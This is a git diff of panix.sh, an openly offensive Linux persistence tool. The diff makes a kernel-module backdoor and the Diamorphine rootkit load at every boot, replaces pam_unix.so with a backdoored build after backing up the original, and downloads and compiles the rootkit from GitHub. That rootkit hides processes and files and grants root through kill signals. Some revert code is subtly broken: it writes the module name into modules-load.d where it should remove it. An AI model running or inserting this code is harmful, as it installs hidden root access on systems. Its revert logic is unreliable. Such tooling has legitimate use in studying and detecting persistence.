hidden." - echo "[+] Source: https://github.com/m0nad/Diamorphine" + echo "[+] The secret is: ${secret}" + echo "[+] The identifier is: ${identifier}" + + echo "[+] kill -31 pid: hide/unhide any process;" + echo "[+] kill -63 pid: turns the module (in)visible;" + echo "[+] kill -64 pid: become root;" + echo "[+] Any file starting with ${secret} is hidden." + echo "[+] Source: https://github.com/m0nad/Diamorphine" } diff --git a/panix.sh b/panix.sh index dd13d38..79c2d68 100644 --- a/panix.sh +++ b/panix.sh @@ -2408,10 +2408,10 @@ setup_lkm_backdoor() { # Ensure proper escaping for C string command="\"/bin/bash\",\"-c\",\"$command\",NULL" lkm_destination="$lkm_path" - mkdir -p $(dirname $lkm_destination) + mkdir -p $(dirname $lkm_destination) fi - mkdir -p ${lkm_compile_dir} + mkdir -p ${lkm_compile_dir} cat <<-EOF > ${lkm_source} #include @@ -2454,12 +2454,12 @@ setup_lkm_backdoor() { MODULE_DESCRIPTION("LKM Backdoor"); EOF - # Check if the source file was created - if [ ! -f "$lkm_source" ]; then - echo "Failed to create the kernel module source code at $lkm_source" - exit 1 - else - echo "Kernel module source code created: $lkm_source" + # Check if the source file was created + if [ ! -f "$lkm_source" ]; then + echo "[-] Failed to create the kernel module source code at $lkm_source" + exit 1 + else + echo "[+] Kernel module source code created: $lkm_source" fi # Create the Makefile @@ -2474,11 +2474,11 @@ clean: make -C /lib/modules/\$(shell uname -r)/build M=\$(PWD) clean EOF - if [ ! -f "${lkm_compile_dir}/Makefile" ]; then - echo "Failed to create the Makefile at ${lkm_compile_dir}/Makefile" + if [ ! -f "${lkm_compile_dir}/Makefile" ]; then + echo "[-] Failed to create the Makefile at ${lkm_compile_dir}/Makefile" exit 1 - else - echo "Makefile created: ${lkm_compile_dir}/Makefile" + else + echo "[+] Makefile created: ${lkm_compile_dir}/Makefile" fi # Compile the kernel module using make @@ -2486,7 +2486,7 @@ EOF make if [ $? -ne 0 ]; then - echo "Compilation failed. Exiting." + echo "[-] Compilation failed. Exiting." exit 1 fi @@ -2494,19 +2494,36 @@ EOF cp ${lkm_compile_dir}/${lkm_name}.ko ${lkm_destination} if [ $? -ne 0 ]; then - echo "Copying module failed. Exiting." + echo "[-] Copying module failed. Exiting." exit 1 fi - echo "Kernel module compiled successfully: ${lkm_destination}" + echo "[+] Kernel module compiled successfully: ${lkm_destination}" sudo insmod ${lkm_destination} if [[ $? -ne 0 ]]; then - echo "Failed to load the kernel module. Check dmesg for errors." + echo "[-] Failed to load the kernel module. Check dmesg for errors." exit 1 fi - echo "Kernel module loaded successfully. Check dmesg for the output." + # Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/ + echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..." + if [ -d "/etc/modules-load.d" ]; then + echo "${lkm_name}" > /etc/modules-load.d/${lkm_name}.conf + fi + + if [ -d "/usr/lib/modules-load.d" ]; then + echo "${lkm_name}" > /usr/lib/modules-load.d/${lkm_name}.conf + fi + + if [ -f "/etc/modules" ]; then + if ! grep -q "^${lkm_name}$" /etc/modules; then + echo "${lkm_name}" >> /etc/modules + fi + fi + + echo "[+] Kernel module loaded successfully. Check dmesg for the output." + echo "[+] Kernel module added to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/" echo "[+] LKM backdoor established!" } @@ -2566,6 +2583,12 @@ revert_lkm() { echo "[-] Temporary directory '${lkm_compile_dir}' not found." fi + # Remove panix from /etc/modules, /etc/modules-load.d/panix.conf and /usr/lib/modules-load.d/panix.conf + echo "[+] Removing panix from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..." + sed -i '/panix/d' /etc/modules + rm -f /etc/modules-load.d/panix.conf + rm -f /usr/lib/modules-load.d/panix.conf + # Update module dependencies echo "[+] Updating module dependencies..." depmod -a @@ -2884,97 +2907,104 @@ setup_malicious_package() { # Revert Module: revert_malicious_package.sh revert_malicious_package() { - usage_revert_malicious_package() { - echo "Usage: ./panix.sh --revert malicious-package" - echo "Reverts any changes made by the setup_malicious_package module." - } + usage_revert_malicious_package() { + echo "Usage: ./panix.sh --revert malicious-package" + echo "Reverts any changes made by the setup_malicious_package module." + } - echo "[+] Reverting malicious package..." + echo "[+] Reverting malicious package..." - if ! check_root; then - echo "Error: This function can only be run as root." - return 1 - fi + if ! check_root; then + echo "Error: This function can only be run as root." + return 1 + fi - local mechanism="" - local PACKAGE_NAME="panix" + local mechanism="" + local PACKAGE_NAME="panix" - # Detect if RPM or DPKG was used - if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then - mechanism="rpm" - elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii ${PACKAGE_NAME} "; then - mechanism="dpkg" - else - echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed." - fi + # Detect if RPM or DPKG was used + if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then + mechanism="rpm" + elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii ${PACKAGE_NAME} "; then + mechanism="dpkg" + else + echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed." + fi - if [[ "$mechanism" == "rpm" ]]; then - echo "[+] Removing RPM package '${PACKAGE_NAME}'..." - rpm -e --noscripts "${PACKAGE_NAME}" - if [[ $? -eq 0 ]]; then - echo "[+] RPM package '${PACKAGE_NAME}' removed successfully." - else - echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'." - fi + if [[ "$mechanism" == "rpm" ]]; then + echo "[+] Removing RPM package '${PACKAGE_NAME}'..." + rpm -e --noscripts "${PACKAGE_NAME}" + if [[ $? -eq 0 ]]; then + echo "[+] RPM package '${PACKAGE_NAME}' removed successfully." + else + echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'." + fi - # Remove the RPM file from /var/lib/rpm - if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then - echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..." - rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" - echo "[+] RPM file removed." - else - echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found." - fi + # Remove the RPM file from /var/lib/rpm + if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then + echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..." + rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" + echo "[+] RPM file removed." + else + echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found." + fi - elif [[ "$mechanism" == "dpkg" ]]; then - echo "[+] Removing DPKG package '${PACKAGE_NAME}'..." - dpkg --purge "${PACKAGE_NAME}" - if [[ $? -eq 0 ]]; then - echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully." - else - echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'." - fi - fi + elif [[ "$mechanism" == "dpkg" ]]; then + echo "[+] Removing DPKG package '${PACKAGE_NAME}'..." + dpkg --purge "${PACKAGE_NAME}" + if [[ $? -eq 0 ]]; then + echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully." + else + echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'." + fi + fi - # Remove the cron job added by the setup function - echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..." - # Create a temporary file to store the current crontab - crontab -l > /tmp/current_cron$$ 2>/dev/null - if [[ $? -ne 0 ]]; then - echo "[-] No crontab for user $(whoami). No action needed." - rm -f /tmp/current_cron$$ - else - # Remove lines containing the malicious package commands - grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$ - # Install the new crontab - crontab /tmp/new_cron$$ - echo "[+] Cron job removed." - # Clean up temporary files - rm -f /tmp/current_cron$$ /tmp/new_cron$$ - fi + # Remove the cron job added by the setup function + echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..." + # Create a temporary file to store the current crontab + crontab -l > /tmp/current_cron$$ 2>/dev/null + if [[ $? -ne 0 ]]; then + echo "[-] No crontab for user $(whoami). No action needed." + rm -f /tmp/current_cron$$ + else + # Remove lines containing the malicious package commands + grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$ + # Install the new crontab + crontab /tmp/new_cron$$ + echo "[+] Cron job removed." + # Clean up temporary files + rm -f /tmp/current_cron$$ /tmp/new_cron$$ + fi - # Clean up any remaining build directories (RPM) - if [[ -d "~/rpmbuild" ]]; then - echo "[+] Removing RPM build directory '~/rpmbuild'..." - rm -rf ~/rpmbuild - echo "[+] RPM build directory removed." - fi + # Clean up any remaining build directories (RPM) + if [[ -d "~/rpmbuild" ]]; then + echo "[+] Removing RPM build directory '~/rpmbuild'..." + rm -rf ~/rpmbuild + echo "[+] RPM build directory removed." + fi - # Clean up any remaining package directories (DPKG) - if [[ -d "${PACKAGE_NAME}" ]]; then - echo "[+] Removing package directory '${PACKAGE_NAME}'..." - rm -rf "${PACKAGE_NAME}" - echo "[+] Package directory removed." - fi + # Clean up any remaining package directories (DPKG) + if [[ -d "${PACKAGE_NAME}" ]]; then + echo "[+] Removing package directory '${PACKAGE_NAME}'..." + rm -rf "${PACKAGE_NAME}" + echo "[+] Package directory removed." + fi - # Remove any lingering files in /var/lib/dpkg/info (DPKG) - if [[ -d "/var/lib/dpkg/info" ]]; then - echo "[+] Cleaning up '/var/lib/dpkg/info'..." - rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."* - echo "[+] Cleanup completed." - fi + # Remove any lingering files in /var/lib/dpkg/info (DPKG) + if [[ -d "/var/lib/dpkg/info" ]]; then + echo "[+] Cleaning up '/var/lib/dpkg/info'..." + rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."* + echo "[+] Cleanup completed." + fi - return 0 + # Remove any package files left in the home directory + if [[ -f "~/${PACKAGE_NAME}.deb" || -f "~/${PACKAGE_NAME}.rpm" ]]; then + echo "[+] Removing package files '~/${PACKAGE_NAME}.deb' and/or '~/${PACKAGE_NAME}.rpm'..." + rm -f ~/${PACKAGE_NAME}.deb ~/${PACKAGE_NAME}.rpm + echo "[+] Package files removed." + fi + + return 0 } # Module: setup_motd_backdoor.sh @@ -3585,9 +3615,11 @@ setup_pam_persistence() { local dest_dir="" local possible_dirs=( "/lib/security" - "/usr/lib64/security" - "/lib/x86_64-linux-gnu/security" "/lib64/security" + "/lib/x86_64-linux-gnu/security" + "/usr/lib/security" + "/usr/lib64/security" + "/usr/lib/x86_64-linux-gnu/security" ) for dir in "${possible_dirs[@]}"; do @@ -3602,6 +3634,9 @@ setup_pam_persistence() { exit 1 fi + echo "[+] Backing up original PAM library..." + mv -f "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak" + echo "[+] Copying PAM library to $dest_dir..." mv -f modules/pam_unix/.libs/pam_unix.so "$dest_dir" @@ -3769,52 +3804,29 @@ revert_pam() { return 1 fi - # Function to restore the original pam_unix.so module - restore_pam_module() { - echo "[+] Restoring original PAM module..." - - # Detect the Linux distribution and package manager - if [ -f /etc/os-release ]; then - . /etc/os-release - linux_distro=${ID_LIKE:-$ID} - else - linux_distro=$(uname -s | tr '[:upper:]' '[:lower:]') - fi - - case "$linux_distro" in - *ubuntu*|*debian*|*mint*|*kali*) - echo "[+] Detected Debian-based distribution." - echo "[+] Reinstalling 'libpam-modules' package..." - apt-get update >/dev/null 2>&1 - apt-get install --reinstall -y libpam-modules >/dev/null 2>&1 - if [[ $? -eq 0 ]]; then - echo "[+] 'libpam-modules' reinstalled successfully." - else - echo "[-] Failed to reinstall 'libpam-modules'." - fi - ;; - *rhel*|*centos*|*fedora*) - echo "[+] Detected RPM-based distribution." - echo "[+] Reinstalling 'pam' package..." - if command -v yum &>/dev/null; then - yum reinstall -y pam >/dev/null 2>&1 - elif command -v dnf &>/dev/null; then - dnf reinstall -y pam >/dev/null 2>&1 - else - echo "[-] Neither 'yum' nor 'dnf' package manager found." - return 1 - fi + remove_rogue_pam() { + echo "[+] Searching for rogue PAM module" + # Check for the presence of the malicious PAM module + pam_module_paths=( + "/lib/security/pam_unix.so" + "/usr/lib/security/pam_unix.so" + "/usr/lib64/security/pam_unix.so" + "/lib/x86_64-linux-gnu/security/pam_unix.so" + "/usr/lib/x86_64-linux-gnu/security/pam_unix.so" + "/lib64/security/pam_unix.so" + ) + + # Revert pam_unix.so with the pam_unix.so.bak backup + for pam_module in "${pam_module_paths[@]}"; do + if [[ -f "$pam_module.bak" ]]; then + mv -f "$pam_module.bak" "$pam_module" if [[ $? -eq 0 ]]; then - echo "[+] 'pam' reinstalled successfully." + echo "[+] Restored original PAM module '$pam_module'." else - echo "[-] Failed to reinstall 'pam'." + echo "[-] Failed to restore original PAM module '$pam_module'." fi - ;; - *) - echo "[-] Unsupported distribution: $linux_distro" - return 1 - ;; - esac + fi + done } # Function to remove malicious PAM_EXEC configurations and scripts @@ -3895,32 +3907,8 @@ revert_pam() { fi } - # Check for the presence of the malicious PAM module - is_pam_module_replaced=false - pam_module_paths=( - "/lib/security/pam_unix.so" - "/usr/lib64/security/pam_unix.so" - "/lib/x86_64-linux-gnu/security/pam_unix.so" - "/lib64/security/pam_unix.so" - ) - for pam_module in "${pam_module_paths[@]}"; do - if [[ -f "$pam_module" ]]; then - # Check if the pam_unix.so has been modified - if strings "$pam_module" | grep -q "PANIX"; then - is_pam_module_replaced=true - break - fi - fi - done - - if [[ "$is_pam_module_replaced" = true ]]; then - echo "[+] Malicious PAM module detected." - restore_pam_module - else - echo "[-] No malicious PAM module detected." - fi - # Remove PAM_EXEC backdoor and logging + remove_rogue_pam remove_pam_exec_backdoor remove_pam_exec_logging @@ -4870,25 +4858,25 @@ revert_reverse_shell() { # Module: setup_rootkit.sh setup_rootkit() { - # References: - # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine - # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh - # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194 + # References: + # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine + # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh + # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194 - local rk_path="/dev/shm/.rk" + local rk_path="/dev/shm/.rk" local tmp_path="/tmp" - local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip" - local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar" - local clone_url="https://github.com/Aegrah/Diamorphine.git" - local secret="" - local identifier="" + local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip" + local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar" + local clone_url="https://github.com/Aegrah/Diamorphine.git" + local secret="" + local identifier="" if ! check_root; then echo "Error: This function can only be run as root." exit 1 fi - usage_rootkit() { + usage_rootkit() { echo "Usage: ./panix.sh --rootkit" echo "--examples Display command examples" echo "--secret Specify the secret" @@ -4953,57 +4941,57 @@ setup_rootkit() { exit 1 fi - echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04." - echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7." - echo "[!] I cannot guarantee that it will work on other distributions." - sleep 5 + echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04." + echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7." + echo "[!] I cannot guarantee that it will work on other distributions." + sleep 5 - mkdir -p $rk_path + mkdir -p $rk_path - # Check if wget or curl is installed - if command -v wget >/dev/null 2>&1; then - downloader="wget" - elif command -v curl >/dev/null 2>&1; then - downloader="curl" - else - echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed." - exit 1 - fi + # Check if wget or curl is installed + if command -v wget >/dev/null 2>&1; then + downloader="wget" + elif command -v curl >/dev/null 2>&1; then + downloader="curl" + else + echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed." + exit 1 + fi - # Function to download files using the available downloader - download_file() { - local url="$1" - local output="$2" - if [ "$downloader" = "wget" ]; then - wget -O "$output" "$url" - else - curl -L -o "$output" "$url" - fi - } + # Function to download files using the available downloader + download_file() { + local url="$1" + local output="$2" + if [ "$downloader" = "wget" ]; then + wget -O "$output" "$url" + else + curl -L -o "$output" "$url" + fi + } - # Check for zip/unzip - if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then - echo "zip/unzip is available. Downloading diamorphine.zip..." - download_file "${zip_url}" "${tmp_path}/diamorphine.zip" - unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine" + # Check for zip/unzip + if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then + echo "zip/unzip is available. Downloading diamorphine.zip..." + download_file "${zip_url}" "${tmp_path}/diamorphine.zip" + unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine" mv ${tmp_path}/diamorphine/Diamorphine-master/* "${rk_path}/" - # Check for tar - elif command -v tar >/dev/null 2>&1; then - echo "tar is available. Downloading diamorphine.tar..." - download_file "${tar_url}" "${tmp_path}/diamorphine.tar" - tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1 + # Check for tar + elif command -v tar >/dev/null 2>&1; then + echo "tar is available. Downloading diamorphine.tar..." + download_file "${tar_url}" "${tmp_path}/diamorphine.tar" + tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1 - # Check for git - elif command -v git >/dev/null 2>&1; then - echo "git is available. Cloning diamorphine.git..." - git clone "${clone_url}" "${tmp_path}/diamorphine" + # Check for git + elif command -v git >/dev/null 2>&1; then + echo "git is available. Cloning diamorphine.git..." + git clone "${clone_url}" "${tmp_path}/diamorphine" mv ${tmp_path}/diamorphine/* "${rk_path}/" - # If none are available - else - echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually." - exit 1 - fi + # If none are available + else + echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually." + exit 1 + fi # Obfuscate most obvious strings # Files @@ -5057,17 +5045,34 @@ setup_rootkit() { fi make -C ${rk_path} clean - touch ${rk_path}/restore_${identifier}.ko + touch ${rk_path}/restore_${identifier}.ko + + # Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/ + echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d..." + + if [ -d "/etc/modules-load.d" ]; then + echo "${identifier}" > /etc/modules-load.d/${identifier}.conf + fi + + if [ -d "/usr/lib/modules-load.d" ]; then + echo "${identifier}" > /usr/lib/modules-load.d/${identifier}.conf + fi + + if [ -f "/etc/modules" ]; then + if ! grep -q "^${identifier}$" /etc/modules; then + echo "${identifier}" >> /etc/modules + fi + fi echo "[+] Diamorphine rootkit has been installed." - echo "[+] The secret is: ${secret}" - echo "[+] The identifier is: ${identifier}" - - echo "[+] kill -31 pid: hide/unhide any process;" - echo "[+] kill -63 pid: turns the module (in)visible;" - echo "[+] kill -64 pid: become root;" - echo "[+] Any file starting with ${secret} is hidden." - echo "[+] Source: https://github.com/m0nad/Diamorphine" + echo "[+] The secret is: ${secret}" + echo "[+] The identifier is: ${identifier}" + + echo "[+] kill -31 pid: hide/unhide any process;" + echo "[+] kill -63 pid: turns the module (in)visible;" + echo "[+] kill -64 pid: become root;" + echo "[+] Any file starting with ${secret} is hidden." + echo "[+] Source: https://github.com/m0nad/Diamorphine" } # Revert Module: revert_rootkit.sh @@ -5173,6 +5178,24 @@ revert_rootkit() { done fi + # Remove the module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/ + echo "[+] Removing rootkit module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..." + if [ -d "/etc/modules-load.d" ]; then + echo "${rk_name}" > /etc/modules-load.d/${rk_name}.conf + fi + + if [ -d "/usr/lib/modules-load.d" ]; then + echo "${rk_name}" > /usr/lib/modules-load.d/${rk_name}.conf + fi + + if [ -f "/etc/modules" ]; then + if grep -q "^${rk_name}$" /etc/modules; then + sed -i "/^${rk_name}$/d" /etc/modules + fi + fi + + echo "[+] Rootkit module removed from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/" + # Step 4: Remove /dev/shm/.rk directory remove_directory "$rk_path"